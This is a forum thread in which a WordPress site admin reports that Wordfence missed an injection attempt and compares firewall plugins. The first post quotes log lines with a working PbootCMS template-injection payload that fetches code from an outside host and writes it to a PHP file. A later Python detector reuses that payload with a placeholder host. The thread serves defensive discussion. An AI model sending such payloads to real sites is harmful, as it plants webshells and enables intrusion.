Wordfence Plugin for Wordpress: Hit-And-Miss

6 Posts
2 Users
0 Reactions
99 Views
Editor
(@editor)
Posts: 553
Honorable Member Admin
Topic starter
 

NOT BLOCKED - MISSED.

The URLs don't exist, still this should have been blocked, since it is clearly a SQL/XSS injection attempt.

Our Imunify360 server-wide protection also missed that. I already know their reply from a previous incident: "why block a 404 url".

Ninja Firewall would have blocked that.

Recent Activity
Time: 1 hour 9 minutes ago -- Tue, 19 Dec 23 13:47:20 +0000 -- 1702993640.482122 in Unixtime
Seconds since last hit: 0.6399
URL: https: // removed /?tagstpl=about.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=static/8.php&t2=file_get_contents&t3=http: // www . goodway . com . hk/d.txt
Type: Page not found
Full Browser ID: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Location: China

Time: 1 hour 9 minutes ago -- Tue, 19 Dec 23 13:47:19 +0000 -- 1702993639.842247 in Unixtime
URL: https: // removed /?tag&tagstpl=about.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=static/8.php&t2=file_get_contents&t3=http: // www . goodway . com . hk/d.txt
Type: Normal request
Full Browser ID: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Location: China

 

 
Posted : December 19, 2023 17:00
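A defensive check for the kind of request logged in the post above, as an added example that is not part of the original thread and not any plugin's own rule: it scores a URL on its decoded query values alone, so a 404 is treated the same as a normal request. The trait names, the function list, the threshold of 2 and the hosts `site.example`, `payload.invalid` and `partner.example` are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristics chosen for this example (assumptions, not any vendor's rule set).
PHP_FUNCS = {"file_put_contents", "file_get_contents", "eval", "assert",
             "system", "passthru", "shell_exec"}
COMMENT_PAD = re.compile(r"/\*.*?\*/")      # /**/ or /*-*/ used as filler
TEMPLATE_IF = re.compile(r"\{[^{}]*:if\(")  # {name:if( ... template condition

def signals(url):
    """Return the suspicious traits found in a URL's decoded query values."""
    found = set()
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        v = value.strip().lower()
        if v in PHP_FUNCS:
            found.add("php_function_as_value")
        if COMMENT_PAD.search(v):
            found.add("comment_padding")
        if TEMPLATE_IF.search(v):
            found.add("template_if_tag")
        if v.startswith(("http://", "https://")):
            found.add("remote_url_value")
        if v.endswith(".php"):
            found.add("php_path_value")
    return found

def scan(log_text, threshold=2):
    """Return (url, traits) per 'URL:' line with >= threshold traits; status is ignored."""
    hits = []
    for line in log_text.splitlines():
        if line.startswith("URL: "):
            url = line[len("URL: "):].strip()
            traits = signals(url)
            if len(traits) >= threshold:
                hits.append((url, traits))
    return hits

# Constructed sample log: hosts are placeholders, first URL mirrors the post.
SAMPLE_LOG = "\n".join([
    "URL: https://site.example/?tagstpl=about.html&tag=%7Bpbohome/Indexot:if("
    "(get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))"
    "%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=static/8.php"
    "&t2=file_get_contents&t3=http://payload.invalid/d.txt",
    "URL: https://site.example/?s=firewall+plugins&page=2",
    "URL: https://site.example/about.html?ref=http://partner.example/",
])

if __name__ == "__main__":
    for url, traits in scan(SAMPLE_LOG):
        print(sorted(traits), url[:50])
```

A single trait, such as the referral link in the last sample line, stays below the threshold, which keeps ordinary links from being flagged.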
Editor
(@editor)
Posts: 553
Honorable Member Admin
Topic starter
 

On the other hand, those have been blocked by THEIR firewall rules (their network rules):

Netherlands was blocked by firewall for WooCommerce Payments <= 5.6.1 Authentication Bypass and Privilege Escalation

IP: 45.154.98.137 Hostname: 45.154.98.137.powered.by.rdp.sh

and

Ukraine was blocked by firewall for N-Media Post Front-end Form < 1.1 - Arbitrary File Upload

IP: 194.38.22.71 Hostname: nbl216.ntup.net

Still, I don't use WooCommerce or any related plugin or that N-Media Post Front-end Form plugin.

So the blocks are more "precautionary" measures in this case, BUT in my first post .... the SQL/XSS (also 404) were not blocked as preventive measures.

 
Posted : December 19, 2023 20:49
Maximus
(@maximus)
Posts: 57
Reputable Member
 

I was under the impression that you used Ninja Firewall and not Wordfence :)

 
Posted : December 22, 2023 13:20
Editor
(@editor)
Posts: 553
Honorable Member Admin
Topic starter
 

@maximus We were running Ninja Firewall for several years, after the fiasco of using The Shield plugin and getting hacked.

Ninja Firewall is an excellent and extremely FAST firewall, but it is missing some features we needed here. Like the ability to block a range of IPs, User Agents, Hostnames etc. Rate Limiting also is a great feature and along with the Live Traffic monitor, makes Wordfence a great choice for us.

The only thing I have disabled is Wordfence Scan, since it seems to create all kinds of problems and issues. Also Wordfence is not a lightweight plugin by any means.

 
Posted : December 22, 2023 15:38
Maximus
(@maximus)
Posts: 57
Reputable Member
 

Isn't that plugin heavy heavy for the DB and the CPUs?

 
Posted : December 22, 2023 21:52
Editor
(@editor)
Posts: 553
Honorable Member Admin
Topic starter
 

Posted by: @maximus

Isn't that plugin heavy heavy for the DB and the CPUs?

The Scan was heavy on the server, but I haven't noticed anything after I disabled it. Just a 5%-8% on the overall system loading BUT I have several custom blocks (user agents and hostnames) on Wordfence (around 80). Also when we rate limit, we auto BLOCK the IP for a week and those IPs add up until cleared. So some DB usage going on all the time.

 

 
Posted : December 22, 2023 22:01